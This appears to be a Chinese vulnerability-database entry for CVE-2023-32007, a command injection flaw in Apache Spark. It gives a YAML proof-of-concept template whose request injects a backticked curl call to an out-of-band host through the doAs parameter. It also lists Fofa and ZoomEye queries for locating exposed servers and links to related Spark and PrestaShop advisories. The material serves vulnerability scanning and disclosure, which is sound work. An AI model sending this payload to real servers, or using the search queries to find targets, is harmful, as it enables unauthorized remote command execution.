CVE-2023-32007: Apache Spark远程代码执行漏洞

漏洞描述

PoC代码[已公开]

id: CVE-2023-32007

info:
  name: Apache Spark远程代码执行漏洞
  author: zan8in
  severity: critical
  verified: false
  description: |-
    Apache Spark 3.4.0之前版本存在命令注入漏洞，该漏洞源于如果ACL启用后，HttpSecurityFilter中的代码路径可以允许通过提供任意用户名来执行模拟，这将导致任意shell命令执行。
    Fofa: app="APACHE-Spark-Jobs"
    ZoomEye: app:"Apache Spark Jobs"
  reference:
    - https://mp.weixin.qq.com/s/jCvb9e_lPWLS01cjw2wqjw
  tags: cve,cve2023,apache,spark,rce
  created: 2023/11/21

set:
  oob: oob()
  oobHTTP: oob.HTTP
rules:
  r0:
    request:
      method: GET
      path: /jobs/?doAs=`curl+{{oobHTTP}}`
    expression: oobCheck(oob, oob.ProtocolHTTP, 3)
expression: r0()

相关漏洞推荐

• CVE-2022-33891: Apache Spark UI - Remote Command Injection POC

  2025-09-01 | Apache Spark UI
  Shodan: title:"Spark Master at" Fofa: title="Spark Master at"

• CVE-2018-8024: Apache Spark UI - Cross-Site Scripting POC

  2025-08-01 | Apache Spark UI
  Apache Spark UI before 2.3.2 is vulnerable to XSS via unsanitized query string parameters in the /jo...

• CVE-2022-33891: Apache Spark UI - Remote Command Injection POC

  2025-08-01 | Apache Spark UI
  Apache Spark UI is susceptible to remote command injection. ACLs can be enabled via the configuratio...

• PrestaShop /module/tshirtecommerce/designer SQL 注入漏洞（CVE-2023-27637） 无POC

  2025-09-19 | PrestaShop
  在 PrestaShop 的 tshirtecommerce（又名自定义产品设计器）组件 2.1.4 中发现了一个问题。可以使用受损的 product_id GET 参数伪造 HTTP 请求，以利用前...

• PrestaShop SQL 注入漏洞（CVE-2023-46358） 无POC

  2025-09-19 | PrestaShop
  Snegurka for PrestaShop模块中的“Referral and Affiliation Program”（推荐和联盟计划）版本3.5.1及之前版本中存在漏洞。通过在方法'R...